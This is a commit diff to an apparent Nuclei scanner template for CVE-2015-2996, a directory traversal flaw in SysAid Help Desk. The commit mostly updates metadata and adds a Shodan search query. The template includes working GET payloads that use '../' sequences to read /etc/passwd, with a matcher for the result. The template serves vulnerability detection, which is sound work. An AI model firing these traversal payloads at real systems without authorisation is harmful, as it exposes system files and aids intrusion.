updated metadata, name and request

patch-1
Ritik Chaddha 2023-02-07 09:59:53 +05:30 committed by GitHub
parent 4eaf4465c1
commit b40089ae2d
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 7 additions and 3 deletions

View File

@ -1,9 +1,10 @@
id: CVE-2015-2996
info:
name: Unauthenticated Local File Disclosure in SysAid Help Desk
name: SysAid Help Desk <15.2 - Local File Disclosure
author: 0x_Akoko
severity: high
description: Multiple directory traversal vulnerabilities in SysAid Help Desk before 15.2 allow remote attackers to (1) read arbitrary files via a .. (dot dot) in the fileName parameter to getGfiUpgradeFile or (2) cause a denial of service (CPU and memory consumption) via a .. (dot dot) in the fileName parameter to calculateRdsFileChecksum.
description: |
Multiple directory traversal vulnerabilities in SysAid Help Desk before 15.2 allow remote attackers to (1) read arbitrary files via a .. (dot dot) in the fileName parameter to getGfiUpgradeFile or (2) cause a denial of service (CPU and memory consumption) via a .. (dot dot) in the fileName parameter to calculateRdsFileChecksum.
reference:
- https://seclists.org/fulldisclosure/2015/Jun/8
- https://nvd.nist.gov/vuln/detail/CVE-2015-2996
@ -12,16 +13,19 @@ info:
cvss-score: 7.5
cve-id: CVE-2015-2996
cwe-id: CWE-22
metadata:
shodan-query: title:"SysAid Help Desk"
tags: cve,cve2015,sysaid,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/sysaid/getGfiUpgradeFile?fileName=../../../../../../../etc/passwd"
- "{{BaseURL}}/getGfiUpgradeFile?fileName=../../../../../../../etc/passwd"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"